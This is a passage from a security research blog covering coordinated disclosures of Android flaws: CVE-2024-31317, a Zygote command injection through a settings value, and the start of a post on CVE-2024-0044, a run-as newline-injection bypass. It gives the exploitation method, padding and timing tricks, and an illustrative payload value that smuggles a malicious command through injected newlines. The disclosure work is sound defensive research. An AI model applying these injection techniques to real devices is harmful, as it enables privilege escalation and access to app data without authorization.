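        // "--injected-arg" parse as a brand-new command.
        System.out.print(serialize("LExempt;->method(,\n1\n--injected-arg"));
    }
}
```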

<p>Interestingly, ZygoteProcess has <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=407-454">a method</a> that issues an arbitrary command and sanitizes newlines, but it’s hardcoded to expect a “spawn process” response, making it unfit for use here. Since not all Zygote commands spawn processes, the inclusion of that assumption in what would otherwise be a generic helper function likely led directly to this bug.</p>

<h2 id="exploitation">Exploitation</h2>

<h3 id="challenge-1-nativecommandbuffer">Challenge #1: NativeCommandBuffer</h3>

<p>On Android 11 and below, exploitation is as simple as described above. In Android 12, however, Google augmented Zygote’s <a href="https://cs.android.com/android/platform/superproject/+/android-11.0.0_r48:frameworks/base/core/java/com/android/internal/os/ZygoteConnection.java;l=113-286">Java command parser</a> with a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=367-506">fast-path C++ one</a> and made both parsers read from the socket via a new class, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=52-288">NativeCommandBuffer</a>.</p>

<p>NativeCommandBuffer makes this vulnerability harder to exploit, not because of its architecture but because of a bug. <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=59-97"><code class="language-plaintext highlighter-rouge">readLine()</code></a> fills a local buffer with bytes from the socket and extracts lines from that buffer, refilling it as necessary. But after parsing all of a command’s lines, Zygote <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=454-455">discards</a><sup id="fnref:java-parser" role="doc-noteref"><a href="#fn:java-parser" class="footnote" rel="footnote">3</a></sup> any remaining bytes in the buffer and reads the next command from the socket. This behavior causes three problems:</p>

<ol>
  <li>If a client writes two commands in a row before Zygote gets around to reading, Zygote will ignore the second one.</li>
  <li>If a client writes a command and a half (e.g. because the second command takes multiple <code class="language-plaintext highlighter-rouge">write()</code> calls) before Zygote reads, Zygote will ignore the start of the second command as above. Furthermore, it will parse the end of the second command as if it were the beginning, which is itself a security flaw. Note, however, that System Server (Zygote’s only client) never writes multiple commands at a time, so this scenario (and the previous one) does not happen in practice.</li>
  <li>If we as attackers use the exact exploit described above, we’ll hit case #1 and our injected lines won’t do anything.</li>
</ol>
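<p>The discard behavior can be modeled in a few lines. This toy model (ours, not the real NativeCommandBuffer) simplifies by mapping each client write to exactly one read, which is the scenario that matters for case #1:</p>

```java
import java.util.ArrayDeque;

public class DiscardModel {
    private final ArrayDeque<String> reads = new ArrayDeque<>();

    public void write(String bytes) {  // client side: one write -> one read
        reads.add(bytes);
    }

    // Zygote side: the first line is the argument count, then that many lines.
    public String[] nextCommand() {
        String buf = reads.poll();     // fresh read; earlier leftovers are gone
        String[] lines = buf.split("\n");
        int argc = Integer.parseInt(lines[0]);
        String[] argv = new String[argc];
        System.arraycopy(lines, 1, argv, 0, argc);
        return argv;                   // lines beyond argc are silently dropped
    }

    public static void main(String[] args) {
        DiscardModel zygote = new DiscardModel();
        zygote.write("1\n--first\n1\n--second\n"); // two commands, one write
        // Only the first command survives; "1\n--second\n" is discarded, which
        // is why a naive version of the exploit does nothing on Android 12+.
        System.out.println(zygote.nextCommand().length);
    }
}
```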

<p>Despite this roadblock, we can still exploit the bug on Android 12+! All we need is a way to keep our malicious command out of Zygote’s first <code class="language-plaintext highlighter-rouge">read()</code> call. We initially tried lengthening our exploit to exceed the buffer length Zygote passes to <code class="language-plaintext highlighter-rouge">read()</code>, but unfortunately Zygote <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=79-82">aborts</a> if a single read ever completely fills its buffer (<a href="https://cs.android.com/android/platform/superproject/+/android-12.0.0_r34:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=48">12200 bytes</a>, expanded to <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=49">32768 bytes</a> in Android 13). So instead we turned to timing: we can assume that Zygote spends most of its time blocked in <code class="language-plaintext highlighter-rouge">read()</code>, which means any write we make is likely to trigger an immediate short read, even if we make another write shortly after.</p>

<p>As we saw, <code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code> makes multiple calls to <code class="language-plaintext highlighter-rouge">state.mZygoteOutputWriter.write()</code>. But do those calls map directly to socket writes? It turns out they don’t, as <code class="language-plaintext highlighter-rouge">mZygoteOutputWriter</code> is a <a href="https://developer.android.com/reference/java/io/BufferedWriter">BufferedWriter</a>, which <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:libcore/ojluni/src/main/java/java/io/BufferedWriter.java;l=125-137">aggregates</a> writes in an internal buffer before writing to the underlying transport.</p>

<p>This is a stroke of luck, as it gives us a ready-made way to issue two socket writes with a decent delay between them. BufferedWriter has a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:libcore/ojluni/src/main/java/java/io/BufferedWriter.java;l=73">buffer size of 8192</a>, smaller than Zygote’s buffer. By padding System Server’s command to exactly 8192 bytes before inserting our malicious command, we force BufferedWriter to write those 8192 bytes first. Zygote will ignore the padding, but it won’t ignore the remainder of our exploit, since—Linux scheduler willing—that will arrive in a separate <code class="language-plaintext highlighter-rouge">read()</code> call.</p>
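<p>This buffering behavior is easy to observe directly. The sketch below is ours and assumes OpenJDK’s BufferedWriter, which flushes its 8192-character buffer as soon as it fills; it records the size of each write that reaches the underlying transport:</p>

```java
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.Writer;
import java.util.ArrayList;
import java.util.List;

public class SplitWrites {
    // Records the size of each write() that reaches the underlying transport.
    static class RecordingWriter extends Writer {
        final List<Integer> sizes = new ArrayList<>();
        @Override public void write(char[] cbuf, int off, int len) { sizes.add(len); }
        @Override public void flush() {}
        @Override public void close() {}
    }

    static List<Integer> writeSizes(String first, String second) {
        RecordingWriter socket = new RecordingWriter();
        try (BufferedWriter out = new BufferedWriter(socket)) { // default 8192-char buffer
            out.write(first);   // exactly filling the buffer flushes it immediately
            out.write(second);  // the tail waits in the buffer...
            out.flush();        // ...until flush() pushes it out separately
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return socket.sizes;
    }

    public static void main(String[] args) {
        // Padding the legitimate command to exactly 8192 bytes guarantees the
        // malicious tail arrives in a second, later write.
        System.out.println(writeSizes("x".repeat(8192), "3\n--injected\n"));
    }
}
```

With a real socket underneath, that second write gives Zygote the chance to complete a short <code class="language-plaintext highlighter-rouge">read()</code> in between.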

<p>To make this outcome more likely, we can insert a large number of commas at the end of our setting value, causing <code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code> to spend time looping after the first write but before the second. Those commas also increase the legitimate command’s argument count, but that’s not a problem as long as we ensure the first 8192 bytes contain at least that many newlines. We just need to stay within two limits:</p>

<ol>
  <li>We shouldn’t write more total bytes than Zygote’s command buffer can hold. If we do, we risk crashing Zygote if it happens to read them all at once.</li>
  <li>The first command’s argument count shouldn’t exceed Zygote’s limit, which it sets to <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=139-141">half its buffer size</a>, because that will also cause a crash.</li>
</ol>

<p>We wrote a script to generate a proof-of-concept that combines these techniques, respecting all relevant constraints. See the Appendix for a detailed discussion of a sample output. In testing across multiple devices, our PoC reliably executes on the first attempt.</p>

<h3 id="challenge-2-return-value-confusion">Challenge #2: return value confusion</h3>

<p>A successful exploit degrades or prevents subsequent process launches until a reboot. That’s because the injected Zygote command outputs extra result bytes that System Server doesn’t consume. System Server uses a single connection to Zygote for all non-<a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_Zygote.cpp;l=2109-2117">USAP</a> commands, so those bytes stick around until it tries to spawn another process, at which point it reads them instead of that process’s PID. System Server <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/am/ActivityManagerService.java;l=4496-4498">won’t bind a process</a> without a record of its PID, and processes that fail to bind get killed.</p>

<p>We avoided this issue on Android 12+ by slightly modifying our exploit: we declared an argument count for our injected command that exceeded the number of newlines in our final socket write, which forced Zygote to perform an additional socket read while parsing it. That read ate whatever command happened to follow ours (overwhelmingly likely to be a process spawn) and prevented Zygote from executing it. Our malicious command in effect replaced that legitimate command, and System Server consumed its PID (actually our PID) as normal, allowing subsequent PIDs to remain in sync.</p>
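<p>Here’s a toy parser (ours, heavily simplified, with made-up command names) showing how an over-declared argument count forces a second read that consumes the next command as data:</p>

```java
import java.util.ArrayDeque;
import java.util.Arrays;

public class ArgCountTrick {
    // Parse one command, performing additional "reads" until the declared
    // number of arguments has actually arrived.
    static String[] parseOne(ArrayDeque<String> reads) {
        StringBuilder buf = new StringBuilder(reads.poll());
        String[] lines = buf.toString().split("\n");
        int argc = Integer.parseInt(lines[0]);
        while (lines.length - 1 < argc) {  // too few lines so far:
            buf.append(reads.poll());      // block in read() for more bytes
            lines = buf.toString().split("\n");
        }
        return Arrays.copyOfRange(lines, 1, 1 + argc);
    }

    public static void main(String[] args) {
        ArrayDeque<String> socket = new ArrayDeque<>();
        socket.add("4\n--some\n--malicious\ncommand\n"); // claims 4 args, supplies 3
        socket.add("1\n--spawn-app\n");                  // stand-in for the next command
        // The legitimate command's count line ("1") is consumed as our fourth
        // "argument", so it never executes on its own. (The real spawn command
        // has many arguments; all of them get eaten the same way.)
        System.out.println(Arrays.toString(parseOne(socket)));
    }
}
```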

<p>This modification also made persistence feasible, as the setting can retain its malicious value across reboots without disrupting the boot process.</p>

<h2 id="attack-scenarios">Attack scenarios</h2>

<h3 id="scenario-1-privilege-escalation">Scenario #1: privilege escalation</h3>

<p>Any app <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/packages/SettingsProvider/src/com/android/providers/settings/SettingsProvider.java;l=1471-1472">with android.permission.WRITE_SECURE_SETTINGS</a> can write to hidden_api_blacklist_exemptions and trigger the exploit. Android <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/res/AndroidManifest.xml;l=4502-4505">declares</a> that permission’s protection level as <code class="language-plaintext highlighter-rouge">signature|privileged|development|role|installer</code>, which means unprivileged apps can’t request it<sup id="fnref:grantability" role="doc-noteref"><a href="#fn:grantability" class="footnote" rel="footnote">4</a></sup>. Various preinstalled apps hold it, though, and an attacker who compromises any of those can use this bug to further escalate privilege.</p>

<h3 id="scenario-2-adb-shell">Scenario #2: ADB shell</h3>

<p>The ADB shell can also read and write settings; it even has a <code class="language-plaintext highlighter-rouge">settings</code> command to make doing so easy. An attacker with physical access to an unlocked device—or a user who wants to bypass system policy (e.g. MDM restrictions) on a device in their possession—can trigger the exploit that way.</p>

<h3 id="scenario-3-signed-config">Scenario #3: <a href="https://source.android.com/docs/core/runtime/signed-config">Signed Config</a></h3>

<p>There’s one other way to set hidden_api_blacklist_exemptions, which is why it exists to begin with: any app (even an <a href="https://developer.android.com/topic/google-play-instant">Instant App</a>!) may contain a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:cts/hostsidetests/signedconfig/app/version1_AndroidManifest.xml;l=22-25">special pair of &lt;meta-data&gt; tags</a> in its manifest, containing</p>

<ol>
  <li>a Base64-encoded value to store in hidden_api_blacklist_exemptions; and</li>
  <li>an ECDSA signature of that value by a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/signedconfig/SignatureVerifier.java;l=47-49">hardcoded, Google-controlled key</a>.</li>
</ol>

<p>If such an app is installed and the signature is valid, Android will immediately <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/signedconfig/GlobalSettingsConfigApplicator.java;l=98-101">apply the setting value</a>, potentially triggering the exploit.</p>
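<p>The mechanism boils down to standard ECDSA signing and verification. As a rough sketch (ours; AOSP’s exact key handling, encoding, and algorithm parameters may differ), with a freshly generated key standing in for Google’s hardcoded one:</p>

```java
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;

public class SignedConfigSketch {
    // Signs a config value, then verifies it the way a device would before
    // applying the setting. Returns the verification result.
    static boolean signAndVerify(byte[] value) {
        try {
            KeyPairGenerator kpg = KeyPairGenerator.getInstance("EC");
            kpg.initialize(256); // P-256 here; a stand-in for the real key
            KeyPair kp = kpg.generateKeyPair();

            Signature signer = Signature.getInstance("SHA256withECDSA");
            signer.initSign(kp.getPrivate());
            signer.update(value);
            byte[] sig = signer.sign();

            // Device side: only apply the value if the signature checks out.
            Signature verifier = Signature.getInstance("SHA256withECDSA");
            verifier.initVerify(kp.getPublic());
            verifier.update(value);
            return verifier.verify(sig);
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(signAndVerify("LExempt;->method(".getBytes()));
    }
}
```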

<p>We believe the signature verification and surrounding logic to be correctly implemented, so it’s likely that the only actor who can exploit devices this way is Google themselves. Nevertheless, most Android devices are not first-party Google devices, and this bug could give Google much greater access to those devices than OEMs and users expect. Notably, CTS <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:cts/hostsidetests/signedconfig/hostside/src/com/android/cts/signedconfig/SignedConfigHostTest.java;l=146-152">requires</a> that Google-signed metadata be accepted, meaning most OEMs couldn’t remove this exploitation path even if they tried.</p>

<p>The intended purpose of this functionality is benign: hidden_api_blacklist_exemptions was <a href="https://android-review.googlesource.com/c/platform/frameworks/base/+/647221">created</a> to be nothing more than an escape hatch to the <a href="https://developer.android.com/guide/app-compatibility/restrictions-non-sdk-interfaces">undocumented API restrictions</a> that Android 9 introduced<sup id="fnref:signedconfig-motivation" role="doc-noteref"><a href="#fn:signedconfig-motivation" class="footnote" rel="footnote">5</a></sup>. Were it not for the vulnerability we’ve detailed, malicious values would pose no great threat.</p>

<h2 id="response">Response</h2>

<p>We reported our findings privately to Google on December 12th, 2023. On December 20th, the Android Security Team rated the issue High severity. Google shared a patch for the immediate issue with us on March 26th, 2024; we reviewed it and verified that it prevents all known exploitation paths. That is <a href="https://android.googlesource.com/platform/frameworks/base/+/e25a0e394bbfd6143a557e1019bb7ad992d11985">the patch Google released today</a>.</p>

<p>Today’s patch does not address the architectural weaknesses we identified, like Zygote’s use of a hand-rolled stream protocol or ZygoteProcess’s lack of a reusable function to safely serialize commands, as those entail bigger changes and are not directly exploitable. Google has communicated that they’re considering such changes going forward, though.</p>

<h2 id="issue-list">Issue list</h2>

<p>For ease of reference, here’s a numbered list of the technical flaws we identified in this report:</p>

<ol>
  <li>[Bug] Newlines contained in hidden_api_blacklist_exemptions are not sanitized before inclusion in Zygote’s newline-delimited wire protocol, allowing command injection.</li>
  <li>[Weakness] As of Android 12, Zygote will only process one command per <code class="language-plaintext highlighter-rouge">read()</code> call, dropping any extra bytes. It’s never permissible to condition behavior on the <code class="language-plaintext highlighter-rouge">read()</code> boundaries of a stream, as the kernel can batch or split writes arbitrarily. (Our original report to Google identified this as an exploitable bug, but Google correctly pointed out that all existing Zygote clients are fully synchronous, meaning at most one command will be buffered in practice.)</li>
  <li>[Weakness] <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java">ZygoteProcess</a> has no single abstraction to serialize an array of arguments into a wire-format command, which means each newly-implemented Zygote command presents a fresh opportunity for an injection bug.</li>
  <li>[Weakness] Zygote uses UNIX stream sockets, which require a custom message framing protocol, instead of UNIX datagram sockets, which provide built-in framing.</li>
  <li>[Weakness] Zygote uses a rudimentary, hand-rolled command protocol instead of a mature RPC protocol like Binder.</li>
</ol>

<h2 id="appendix-proof-of-concept">Appendix: proof-of-concept</h2>

<p>For illustrative purposes, let’s imagine that BufferedWriter buffers only 64 bytes and that Zygote limits commands to 100 bytes (meaning it will abort if a single read ever returns 100 bytes or more). Plugging those parameters into our script, along with a 3-argument injected command (<code class="language-plaintext highlighter-rouge">["--some", "--malicious", "command"]</code>), results in the following value for hidden_api_blacklist_exemptions:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>




AAAAAAAAAAAAAAAAAAAAAAAAAAA3
--some
--malicious
command
,,,,X
</code></pre></div></div>

<p>System Server sees this as a comma-separated list with 5 <strong>entries</strong>. Note that we distinguish “entries” from <strong>arguments</strong>: the former are the comma-separated list items provided to System Server via hidden_api_blacklist_exemptions, while the latter are the Zygote command arguments that go out on the wire. In this example, the 5 entries are as follows…</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[
  "\n\n\n\n\nAAAAAAAAAAAAAAAAAAAAAAAAAAA3\n--some\n--malicious\ncommand\n",
  "",
  "",
  "",
  "X",
]
</code></pre></div></div>

<p>…but because we’ve injected newlines, those entries don’t correspond directly to arguments. Instead, the first entry spans 5 arguments and then continues on to start a second 64-byte block with our malicious command! Here’s what <code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code> ends up writing to Zygote’s socket (brackets for annotation, as before):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>6                              [arg count: special arg + 5 entries]
--set-api-denylist-exemptions  [uncontrolled arg #1: action to take]
                               [beginning of entry #1: empty args #2-#6]




AAAAAAAAAAAAAAAAAAAAAAAAAAA3   [pad to exactly 64 bytes, then arg count]
--some                         [args #1-#3: malicious command]
--malicious
command

                               [entries #2-#5, emitted in loop, each
                                lengthening the delay between writes]

X
</code></pre></div></div>

<p>There are just enough <code class="language-plaintext highlighter-rouge">A</code> characters to make <code class="language-plaintext highlighter-rouge">3</code>, the beginning of our malicious command, occur at offset 64. And there are just enough empty “delay entries” to bring the total size to 99, as high as it can go without exceeding Zygote’s length limit. That gives us the best timing we can get while still keeping failures silent.</p>
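<p>The arithmetic is easy to check. This sketch (ours) rebuilds the wire bytes from the example above and confirms both properties: the injected arg count lands at offset 64, and the total comes to 99 bytes.</p>

```java
public class AppendixCheck {
    // Rebuild the wire bytes for the illustrative 64-byte-buffer example:
    // count, action, then the five entries, each newline-terminated.
    static String wire() {
        String entry1 = "\n".repeat(5) + "A".repeat(27)
                + "3\n--some\n--malicious\ncommand\n";
        String[] entries = { entry1, "", "", "", "X" };
        StringBuilder sb = new StringBuilder();
        sb.append(entries.length + 1).append('\n');
        sb.append("--set-api-denylist-exemptions").append('\n');
        for (String e : entries) sb.append(e).append('\n');
        return sb.toString();
    }

    public static void main(String[] args) {
        String w = wire();
        System.out.println(w.indexOf("3\n--some")); // 64: start of the second block
        System.out.println(w.length());             // 99: just under the 100-byte limit
    }
}
```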

<p>Note that the last delay entry isn’t empty like the rest. That’s to work around the fact that Java’s <code class="language-plaintext highlighter-rouge">String.split()</code> function, used by System Server to parse the setting value, <a href="https://developer.android.com/reference/java/lang/String#split(java.lang.String)">discards trailing empty strings</a>.</p>
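<p>A two-line demonstration of that <code class="language-plaintext highlighter-rouge">String.split()</code> quirk:</p>

```java
public class SplitDemo {
    public static void main(String[] args) {
        // With the default limit, split() discards trailing empty strings...
        System.out.println(",,,".split(",").length);  // 0: all entries vanish
        // ...so a final non-empty entry is needed to anchor the empties.
        System.out.println(",,,X".split(",").length); // 4: empties preserved
    }
}
```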

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>June–November, 2023: We find and document the bug after noticing weaknesses in Zygote’s wire protocol.</li>
  <li>December 12th, 2023: We report our findings to Google, who passes them to the Android Security Team.</li>
  <li>December 20th, 2023: Google notifies us that they’ve rated the issue High Severity.</li>
  <li>February 6th, 2024: We ask Google for a progress update. They respond on February 20th that they’re developing a fix but have no ETA.</li>
  <li>February 15th, 2024: We extend our tentative disclosure date from March 12th (90 days after our report) to April 4th to accommodate planned time off within RTX.</li>
  <li>March 12th, 2024: Google proposes a call to discuss their fix, which we schedule for March 26th.</li>
  <li>March 26th, 2024: On the call, Google shares a proposed patch with us and we agree on a coordinated disclosure date of June 3rd, 2024. Google also disputes our assertion that Zygote’s <code class="language-plaintext highlighter-rouge">read()</code> semantics pose a security threat in practice, which we accept after further investigation. Google requests a draft of this post to help with their messaging.</li>
  <li>April 11th, 2024: Google offers us a $7,000 bounty for our report, which we request be donated to charity. (Google, like Meta, doubles bounties paid to charity.)</li>
  <li>May 6th, 2024: Meta is sent the June 2024 Android Security Bulletin preview, and RTX confirms the patch we saw is present and learns the CVE ID, CVE-2024-31317.</li>
  <li>May 21st, 2024: Google shares the CVE ID with us via our bug report.</li>
  <li>June 3rd, 2024: We share a draft of this post with Google (and apologize for not sharing one earlier). Later in the day, it, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x9q9-2r8c-hg2p">our disclosure</a>, the <a href="https://source.android.com/docs/security/bulletin/2024-06-01">June ASB</a>, and <a href="https://www.cve.org/CVERecord?id=CVE-2024-31317">CVE-2024-31317</a> all go live.</li>
</ul>

<h2 id="footnotes">Footnotes</h2>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:cap-setuid" role="doc-endnote">
      <p>The vast majority of processes neither have the appropriate capability (<code class="language-plaintext highlighter-rouge">CAP_SETUID</code>) nor run in an SELinux domain that lets them use that capability. <a href="#fnref:cap-setuid" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:system-server" role="doc-endnote">
      <p>System Server is a highly trusted process, halfway between an app and a daemon, that routes intents, starts and stops apps, and hosts <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:system/sepolicy/public/service.te;l=57-268">most app-facing APIs</a>. It runs with a dedicated SELinux domain and never stops, like a daemon. But it’s forked from Zygote and has a package (named simply <code class="language-plaintext highlighter-rouge">android</code>), like an app. To avoid a circular dependency, Zygote forks System Server at boot by running a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteInit.java;l=746-757">hardcoded command</a>. <a href="#fnref:system-server" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:java-parser" role="doc-endnote">
      <p>The Java parser performs an equivalent operation by <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteConnection.java;l=120">constructing an entirely new ZygoteCommandBuffer</a> after each command. <a href="#fnref:java-parser" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:grantability" role="doc-endnote">
      <p>It would be declared as <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/res/res/values/attrs_manifest.xml;l=195-211"><code class="language-plaintext highlighter-rouge">normal</code> or <code class="language-plaintext highlighter-rouge">dangerous</code></a> if grantable to unprivileged apps. <a href="#fnref:grantability" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:signedconfig-motivation" role="doc-endnote">
      <p><a href="https://source.android.com/docs/core/runtime/signed-config">The idea</a> was that, if one of the forbidden APIs was later found to be needed for backwards-compatibility, Google could retroactively exempt that API from enforcement by adding an appropriately-signed setting value in a release of the AndroidX support library. <a href="#fnref:signedconfig-motivation" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="exploitation" /><summary type="html"><![CDATA[We have discovered a vulnerability in Android that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they can read and write any app’s data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. Our exploit involves no memory corruption, meaning it works unmodified on virtually any device running Android 9 or later, and persists across reboots.]]></summary></entry><entry><title type="html">Bypassing the “run-as” debuggability check on Android via newline injection</title><link href="https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html" rel="alternate" type="text/html" title="Bypassing the “run-as” debuggability check on Android via newline injection" /><published>2024-03-04T00:00:00+00:00</published><updated>2024-03-04T00:00:00+00:00</updated><id>https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery</id><content type="html" xml:base="https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html"><![CDATA[<p>An attacker with ADB access to an Android device can trick the “run-as” tool into believing any app is debuggable. By doing so, they can read and write private data and invoke system APIs as if they were most apps on the system—including many privileged apps, but not ones that run as the <code class="language-plaintext highlighter-rouge">system</code> user. Furthermore, they can achieve persistent code execution as Google Mobile Services (GMS) or as apps that use its SDKs by altering executable code that GMS caches in its data directory.</p>

<p>Google assigned the issue <a href="https://www.cve.org/CVERecord?id=CVE-2024-0044">CVE-2024-0044</a> and fixed it in the <a href="https://source.android.com/docs/security/bulletin/2024-03-01">March 2024 Android Security Bulletin</a>, which becomes public today. Most device manufacturers received an advance copy of the Bulletin a month ago and have already prepared updates that include its fixes.</p>

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>On Android 12 and 13<sup id="fnref:14-not-affected" role="doc-noteref"><a href="#fn:14-not-affected" class="footnote" rel="footnote">1</a></sup>, a newly-installed app’s “installer package name” is not sanitized when set via <code class="language-plaintext highlighter-rouge">pm install</code>’s <code class="language-plaintext highlighter-rouge">-i</code> flag. Neither <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:frameworks/base/services/core/java/com/android/server/pm/PackageManagerShellCommand.java;l=3062"><code class="language-plaintext highlighter-rouge">pm</code></a> nor the underlying <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:frameworks/base/services/core/java/com/android/server/pm/PackageInstallerService.java;l=643-653">PackageInstallerService</a> check that it doesn’t contain special characters, let alone that it references an installed package.</p>

<p>Although special characters in the installer package name are harmlessly escaped when written to <code class="language-plaintext highlighter-rouge">/data/system/packages.xml</code>, they are <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:frameworks/base/services/core/java/com/android/server/pm/Settings.java;l=2805">not escaped</a> when written to <code class="language-plaintext highlighter-rouge">/data/system/packages.list</code>, which replicates certain package metadata in a simple newline- and space-delimited format. By providing a name with newlines and spaces, an attacker with ADB shell access can inject an arbitrary number of fake fields and entries<sup id="fnref:entry-order" role="doc-noteref"><a href="#fn:entry-order" class="footnote" rel="footnote">2</a></sup> into <code class="language-plaintext highlighter-rouge">packages.list</code>.</p>

<p>One user<sup id="fnref:other-users" role="doc-noteref"><a href="#fn:other-users" class="footnote" rel="footnote">3</a></sup> of <code class="language-plaintext highlighter-rouge">packages.list</code> is <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp">run-as</a>, which lets the ADB shell run code in the context of a given app. run-as is designed to reject non-<a href="https://developer.android.com/privacy-and-security/risks/android-debuggable">debuggable</a> apps, but it queries the app’s debuggability—along with its UID, SELinux context, and data directory—from <code class="language-plaintext highlighter-rouge">packages.list</code>. By injecting a fake entry that preserves the latter but alters the former, the attacker can bypass the debuggability check and become nearly any app on the system.</p>

<p>We say “nearly” because run-as does have some extra defense-in-depth checks, the most notable of which is that it won’t assume non-app UIDs (including the <code class="language-plaintext highlighter-rouge">system</code> user, reserved for the most highly-privileged apps) even if <code class="language-plaintext highlighter-rouge">packages.list</code> says it should. It also doesn’t assume the same SELinux context as the real app, since it only considers <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/seapp_contexts;l=177-178"><code class="language-plaintext highlighter-rouge">seapp_contexts</code></a> with <code class="language-plaintext highlighter-rouge">fromRunAs=true</code>: this makes no difference for unprivileged apps, since <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/runas_app.te">runas_app</a> is strictly more privileged than <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/untrusted_app_all.te">untrusted_app</a>, but it does prevent the attacker from taking actions gated to <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/priv_app.te">priv_app</a> or <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/platform_app.te">platform_app</a>—even as an app that normally could.</p>

<p>The issue is compounded by a separate logic bug in run-as that lets it target privapps. Typically, that would be forbidden by the checks in <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp;l=98-143"><code class="language-plaintext highlighter-rouge">check_data_path()</code></a>, which try to ensure that</p>

<ol>
  <li>every parent of the app’s data directory is owned by <code class="language-plaintext highlighter-rouge">system</code>, and</li>
  <li>the data directory itself is owned by the app’s UID.</li>
</ol>

